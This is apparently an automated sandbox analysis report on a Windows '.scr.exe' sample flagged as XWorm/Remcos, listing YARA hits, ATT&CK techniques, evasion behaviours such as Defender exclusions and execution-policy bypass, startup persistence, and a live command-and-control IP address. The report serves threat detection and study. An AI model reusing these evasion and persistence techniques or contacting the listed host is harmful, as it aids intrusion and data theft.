              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected XWorm
              Source: Yara matchFile source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.30d2444.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.307b134.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.30d2444.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.307b134.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000003.00000002.4573179094.0000000003301000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4558499352.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2157295618.0000000003071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: THITWNSEI24112908089786756456545346568789-00010.scr.exe PID: 4916, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: THITWNSEI24112908089786756456545346568789-00010.scr.exe PID: 3564, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected XWorm
              Source: Yara matchFile source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.30d2444.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.307b134.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.30d2444.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.307b134.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000003.00000002.4573179094.0000000003301000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4558499352.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2157295618.0000000003071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: THITWNSEI24112908089786756456545346568789-00010.scr.exe PID: 4916, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: THITWNSEI24112908089786756456545346568789-00010.scr.exe PID: 3564, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
              Windows Management Instrumentation              		2
              Registry Run Keys / Startup Folder              		11
              Process Injection              		1
              Masquerading              		OS Credential Dumping211
              Security Software Discovery              		Remote Services11
              Archive Collected Data              		1
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              PowerShell              		1
              DLL Side-Loading              		2
              Registry Run Keys / Startup Folder              		11
              Disable or Modify Tools              		LSASS Memory1
              Process Discovery              		Remote Desktop ProtocolData from Removable Media1
              Non-Standard Port              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
              DLL Side-Loading              		131
              Virtualization/Sandbox Evasion              		Security Account Manager131
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive1
              Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
              Process Injection              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Deobfuscate/Decode Files or Information              		LSA Secrets1
              File and Directory Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
              Obfuscated Files or Information              		Cached Domain Credentials13
              System Information Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items22
              Software Packing              		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              Timestomp              		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
              DLL Side-Loading              		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 signatures2 2 Behavior Graph ID: 1566987 Sample: THITWNSEI241129080897867564... Startdate: 02/12/2024 Architecture: WINDOWS Score: 100 42 Suricata IDS alerts for network traffic 2->42 44 Found malware configuration 2->44 46 Malicious sample detected (through community Yara rule) 2->46 48 15 other signatures 2->48 8 THITWNSEI24112908089786756456545346568789-00010.scr.exe 3 2->8         started        process3 file4 34 THITWNSEI241129080...9-00010.scr.exe.log, ASCII 8->34 dropped 50 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->50 52 Bypasses PowerShell execution policy 8->52 54 Adds a directory exclusion to Windows Defender 8->54 12 THITWNSEI24112908089786756456545346568789-00010.scr.exe 6 8->12         started        signatures5 process6 dnsIp7 38 104.250.180.178, 49770, 7061 M247GB United States 12->38 36 C:\Users\user\AppData\Roaming\XClient.exe, PE32 12->36 dropped 56 Adds a directory exclusion to Windows Defender 12->56 17 powershell.exe 21 12->17         started        20 powershell.exe 23 12->20         started        22 powershell.exe 23 12->22         started        24 powershell.exe 12->24         started        file8 signatures9 process10 signatures11 40 Loading BitLocker PowerShell Module 17->40 26 conhost.exe 17->26         started        28 conhost.exe 20->28         started        30 conhost.exe 22->30         started        32 conhost.exe 24->32         started        process12

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              THITWNSEI24112908089786756456545346568789-00010.scr.exe42%ReversingLabsByteCode-MSIL.Trojan.Remcos
              THITWNSEI24112908089786756456545346568789-00010.scr.exe100%AviraHEUR/AGEN.1309499
              THITWNSEI24112908089786756456545346568789-00010.scr.exe100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Roaming\XClient.exe100%AviraHEUR/AGEN.1309499
              C:\Users\user\AppData\Roaming\XClient.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Roaming\XClient.exe45%ReversingLabsByteCode-MSIL.Trojan.Remcos

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://crl.miSt0%Avira URL Cloudsafe
              http://crl.microR0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              No contacted domains info

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              104.250.180.178false
                		high

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.2221643363.0000000005D28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2262886255.0000000005319000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2315451804.00000000058A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2375247049.0000000005DC9000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://crl.micropowershell.exe, 00000007.00000002.2268207610.0000000006C99000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000E.00000002.2354647284.0000000004EB6000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000004.00000002.2215062387.0000000004E16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2252132549.0000000004406000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2296539543.0000000004996000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354647284.0000000004EB6000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://aka.ms/pscore6lBpowershell.exe, 00000004.00000002.2215062387.0000000004CC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2252132549.00000000042B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2296539543.0000000004841000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354647284.0000000004D61000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000E.00000002.2354647284.0000000004EB6000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://go.micropowershell.exe, 0000000E.00000002.2354647284.0000000005496000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354647284.00000000056C0000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000004.00000002.2215062387.0000000004E16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2252132549.0000000004406000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2296539543.0000000004996000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354647284.0000000004EB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://contoso.com/powershell.exe, 0000000E.00000002.2375247049.0000000005DC9000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.2221643363.0000000005D28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2262886255.0000000005319000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2315451804.00000000058A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2375247049.0000000005DC9000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://contoso.com/Licensepowershell.exe, 0000000E.00000002.2375247049.0000000005DC9000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://contoso.com/Iconpowershell.exe, 0000000E.00000002.2375247049.0000000005DC9000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://crl.microsoft.cpowershell.exe, 00000007.00000002.2251654421.0000000002944000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          http://crl.miStpowershell.exe, 0000000A.00000002.2322743130.000000000725D000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameTHITWNSEI24112908089786756456545346568789-00010.scr.exe, 00000003.00000002.4573179094.0000000003301000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2215062387.0000000004CC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2252132549.00000000042B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2296539543.0000000004841000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354647284.0000000004D61000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://github.com/Pester/Pesterpowershell.exe, 0000000E.00000002.2354647284.0000000004EB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://crl.microRpowershell.exe, 00000004.00000002.2232645049.0000000008764000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown

                                              World Map of Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public IPs

                                              IPDomainCountryFlagASNASN NameMalicious
                                              104.250.180.178
                                              		unknownUnited States
                                              		9009M247GBtrue

                                              General Information

                                              Joe Sandbox version:41.0.0 Charoite
                                              Analysis ID:1566987
                                              Start date and time:2024-12-02 22:04:05 +01:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 9m 8s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:17
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:THITWNSEI24112908089786756456545346568789-00010.scr.exe
                                              Detection:MAL
                                              Classification:mal100.troj.evad.winEXE@15/21@0/1
                                              EGA Information:
                                              • Successful, ratio: 66.7%
                                              HCA Information:
                                              • Successful, ratio: 99%
                                              • Number of executed functions: 322
                                              • Number of non-executed functions: 5
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe
                                              • Override analysis time to 240000 for current running targets taking high CPU consumption

                                              Warnings

                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe, svchost.exe
                                              • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                              • Execution Graph export aborted for target powershell.exe, PID 1176 because it is empty
                                              • Execution Graph export aborted for target powershell.exe, PID 4180 because it is empty
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size getting too big, too many NtCreateKey calls found.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              • VT rate limit hit for: THITWNSEI24112908089786756456545346568789-00010.scr.exe

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              16:05:02API Interceptor7240393x Sleep call for process: THITWNSEI24112908089786756456545346568789-00010.scr.exe modified
                                              16:05:07API Interceptor45x Sleep call for process: powershell.exe modified
                                              22:05:33AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              104.250.180.178SKM_BH450i2411261138090453854974574748668683985857435.scr.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                                #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeGet hashmaliciousPureLog Stealer, RemcosBrowse
                                                  Draft - HBL# WSPAE1311198 VSL# COSCO NETHERLANDS V-067E.scr.exeGet hashmaliciousPureLog Stealer, RemcosBrowse
                                                    CI-PL- HBL# WSPAE1311198 VSL# COSCO NETHERLANDS V-067E.scr.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                                      Doc089776867565357609 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exeGet hashmaliciousRemcosBrowse
                                                        PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exeGet hashmaliciousXWormBrowse
                                                          rSOD219ISF-____.scr.exeGet hashmaliciousRemcosBrowse
                                                            rWWTLCLtoUSADCL.scr.exeGet hashmaliciousXWormBrowse
                                                              ttCOg61bOg.exeGet hashmaliciousRemcosBrowse
                                                                SKM_C364e24092511300346565787689900142344656767788755634232343456768953334466870.scr.exeGet hashmaliciousRemcosBrowse

                                                                  Domains

                                                                  No context

                                                                  ASNs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  M247GBrAttached_updat.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                  • 172.111.247.228
                                                                  teste.arm.elfGet hashmaliciousGafgyt, Mirai, Moobot, OkiruBrowse
                                                                  • 158.46.140.103
                                                                  sora.ppc.elfGet hashmaliciousMiraiBrowse
                                                                  • 38.201.44.7
                                                                  la.bot.arm5.elfGet hashmaliciousUnknownBrowse
                                                                  • 62.216.72.28
                                                                  arm7-20241130-2047.elfGet hashmaliciousMiraiBrowse
                                                                  • 38.206.34.38
                                                                  sample.bin.exeGet hashmaliciousUnknownBrowse
                                                                  • 172.86.76.228
                                                                  sample.bin.exeGet hashmaliciousUnknownBrowse
                                                                  • 172.86.76.228
                                                                  EEghgCvQUy.exeGet hashmaliciousDanaBotBrowse
                                                                  • 172.86.76.246
                                                                  3yb52PgwJ2.exeGet hashmaliciousDanaBotBrowse
                                                                  • 172.86.76.246
                                                                  EEghgCvQUy.exeGet hashmaliciousDanaBotBrowse
                                                                  • 172.86.76.246

                                                                  JA3 Fingerprints

                                                                  No context

